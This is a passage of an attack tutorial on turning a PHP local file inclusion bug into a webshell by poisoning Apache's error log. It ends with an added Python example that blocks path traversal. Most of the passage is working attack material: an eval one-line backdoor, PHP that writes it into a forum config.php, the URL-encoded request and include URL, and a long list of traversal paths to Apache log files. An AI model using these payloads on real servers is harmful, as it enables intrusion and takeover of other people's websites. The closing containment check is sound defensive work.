Because the approach above is not very practical (in my tests the logs were routinely tens of megabytes, which made it no fun to play with), let's take it one step further: we write a genuinely usable webshell, which is far better than the painfully slow method above.

For example, take the same one-line backdoor:
<?eval($_POST[cmd]);?>
By now you have probably already thought of it; this is a pretty good approach. Next, the question is how to write it. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line backdoor server-side statement <?eval($_POST[cmd]);?> into it. Expressed as PHP, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> //writes the one-line backdoor statement into config.php

We submit this, let Apache record it in the error log, then include the log and the shell is written. Remember that it must be converted to URL-encoded form or it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now contains this line of code that writes the webshell.
Now we include the log again, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
The webshell is now written; config.php contains the one-line backdoor statement.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect with lanker's client and the host is yours.
PS: All of the above assumes the directory is writable; its permissions must be -rwxrwxrwx (777) to proceed. Here you can check that directly against the directories listed above. Everything above is exploitation in the case where the log path is known.
For other log paths, you can guess, or refer to this list:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
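Every entry in the list above is an input that a vulnerable include such as the post's z.php?zizzy=... passes to include() unchanged. The following is an added example, not code from the post (Python rather than PHP), showing the two ways such a parameter is resolved safely: prefer an opaque key that maps to a filename, and where a relative filename must be accepted, normalize it and require the result to stay under the include directory. INCLUDE_BASE and ALLOWED_PAGES are hypothetical; the candidate parameters are log paths taken from the list above, and the audit confirms each is rejected. The post's other precondition, a 777 directory, is a separate misconfiguration that this check does not address.

```python
"""Safe resolution of an include parameter (the post's z.php?zizzy=... pattern).

Added example. INCLUDE_BASE and ALLOWED_PAGES are hypothetical; the candidate
paths in LOG_PATH_CANDIDATES are taken from the post's list.
"""
import os

# Hypothetical directory holding the only files the script is allowed to include.
INCLUDE_BASE = "/var/www/app/pages"
# Hypothetical allowlist: the client sends a key, never a path.
ALLOWED_PAGES = {"home": "home.php", "forum": "forum.php", "help": "help.php"}


def resolve_by_key(key: str) -> str:
    """Preferred design: an opaque key selects a file; unknown keys are refused."""
    if key not in ALLOWED_PAGES:
        raise ValueError(f"unknown page key: {key!r}")
    return os.path.join(INCLUDE_BASE, ALLOWED_PAGES[key])


def resolve_contained(param: str):
    """Fallback when a relative filename must be accepted.

    Returns the absolute path to include, or None if the parameter is empty,
    absolute, contains a NUL, escapes INCLUDE_BASE after normalization, or is
    not a .php file. The web server has already percent-decoded the query
    string, so the value is taken as-is.
    """
    if not param or "\x00" in param or os.path.isabs(param):
        return None
    base = os.path.realpath(INCLUDE_BASE)
    resolved = os.path.realpath(os.path.join(base, param))
    # realpath collapses every "../" segment, so a traversal string resolves
    # to a path outside base and fails the containment test below.
    if os.path.commonpath([base, resolved]) != base:
        return None
    if not resolved.endswith(".php"):
        return None
    return resolved


def audit(candidates) -> dict:
    """Map each candidate parameter to the path it would include, or None."""
    return {c: resolve_contained(c) for c in candidates}


# Log paths from the post's list; none of them may ever be included.
LOG_PATH_CANDIDATES = [
    "../../../../../../../../../../var/log/httpd/access_log",
    "../../../apache/logs/error.log",
    "/var/log/apache/error.log",
    "/usr/local/apache/logs/access_log",
]

if __name__ == "__main__":
    for param, target in audit(LOG_PATH_CANDIDATES + ["forum.php"]).items():
        print(f"{param!r:60} -> {target}")
    print(resolve_by_key("forum"))
```

The containment check is the one that defeats the list above: both the ten-level "../" strings and the absolute paths resolve outside INCLUDE_BASE, and the absolute ones are refused even earlier by isabs(). The key-based resolver is still the better design, because it never lets the client name a file at all, so there is nothing to normalize.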